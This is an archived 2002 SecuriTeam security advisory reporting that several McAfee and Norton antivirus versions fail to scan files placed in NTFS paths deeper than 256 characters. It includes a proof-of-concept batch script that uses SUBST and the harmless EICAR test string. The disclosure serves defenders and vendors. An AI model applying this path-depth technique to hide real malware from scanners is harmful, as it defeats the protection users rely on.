[NT] Virus Can Exploit Long Path under NTFS to Evade Detection

• Previous message: support@securiteam.com: "[UNIX] RRDTool Path Disclosure Vulnerability (MRTG)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: Tue,  5 Feb 2002 18:07:55 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Virus Can Exploit Long Path under NTFS to Evade Detection
------------------------------------------------------------------------

SUMMARY

The NTFS file system seems to be a hiding place for viruses if they
utilize a file path that exceeds 256 characters. This vulnerability allows
virus writers to store infected files in directories that would not be
checked by the antivirus, and therefore will not be detected or removed.

DETAILS

Vulnerable systems:
McAfee VirusScan version 4.5.1
Norton Antivirus version 5.0
Norton Antivirus version 7.5.1
Norton Antivirus version 8.00.58
Norton Antivirus Corporate version 7.60.926

The file path (drive + folder path + filename) theoretically can take up
to 32000 characters if the file system in use is NTFS. However, the way in
which Windows NT (Windows NT 4.0, Windows 2000, and Windows XP) access
this file system a maximum of 256 characters is in place. If you try to go
deeper, you will experience a "Path too long" error.

In there Operating Systems, there is a way to substitute a long folder
path, using the "SUBST" command. If you change your current drive to the
substituted drive, the path length is reset to 3 (Q:\ e.g.) and Windows NT
allows you to create an even deeper path.

Normally this would not alarm anyone, however, it was discovered that most
Antivirus packages (such as Norton Antivirus and MacAfee) were not able to
follow the deep path that contained an EICAR-test string.

Recreation:
(NOTE: The batch file contains a long string path that was wrapped; it
should be on a one line)
@echo off
cls
echo Start test-script NTFS-limit
@echo Create a file path to the limit of NTFS
md
c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567
890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
\1234567890\1234567890\1234567890\1234567890\1234567890\123456789

cd
c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567
890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
\1234567890\1234567890\1234567890\1234567890\1234567890\123456789

@echo Create the Eicar test-string for PoC. This should be detected
normally if you have an active virusscanner.

echo
X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >
EICAR.TXT

echo. >>EICAR.TXT
@echo Activate the Eicar test-string
copy EICAR.TXT EICAR1.COM >NUL
@echo Create a subst-drive Q: for this path
subst Q:
c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567
890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
\1234567890\1234567890\1234567890\1234567890\1234567890\123456789

@echo Create e even deeper filepath (thus exceeding the limit of NTFS's
explorer)
md Q:\1234567890\1234567890\1234567890
@echo Change current folder into "the deep"
Q:
cd Q:\1234567890\1234567890\1234567890
@echo Create the Eicar test-string
echo
X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >
EICAR.TXT
echo. >>EICAR.TXT
@echo Activate the Eicar test-string
copy EICAR.TXT EICAR2.COM >NUL
EICAR2.COM
echo .
echo End of test-script

ADDITIONAL INFORMATION

The information has been provided by <mailto:hans.somers@nl.abnamro.com>
Hans Somers, <mailto:lsawyer@gci.com> Leif Sawyer, and
<mailto:Remko.Catersels@asr.nl> Remko Catersels.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: support@securiteam.com: "[UNIX] RRDTool Path Disclosure Vulnerability (MRTG)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages Re: My slide show transitions and custom animation tools arent wo ... Echo ... I do use Norton Antivirus and regularly update it. ... >> I'd also suggest downloading and running AdAware ... I am looking at System Information. ... (microsoft.public.powerpoint) [Full-Disclosure] Norton AntiVirus nested file manual scan bypass..... ... Norton AntiVirus nested file manual scan bypass..... ... If you manage to inject a file in the ... @echo off ... (Full-Disclosure) Re: My slide show transitions and custom animation tools arent wo ... To Echo: I do use Norton Antivirus and regularly update it. ... >> Click Art window up. ... I am looking at System Information. ... (microsoft.public.powerpoint) Re: Norton Antivirus 2002 fails to scan files with ... [2nd... UPDATED] ... Norton Antivirus 2002 fails to scan files with special characterproperly. ... Discovered By: Bipin Gautam (hUNT3R) ... echo ... (Bugtraq) RE: Long path exploit on NTFS ... > Windows NT 4.0 SP6a ... > Norton AntiVirus 5.0 ... Create the Eicar test-string for PoC. ... Virus name: EICAR Test String.70 ... (Bugtraq)

• Security
• UNIX
• Linux
• Coding
• Usenet

• News
• Mailing-Lists
• Newsgroups
• Service
• About
• Privacy
• Search
• Imprint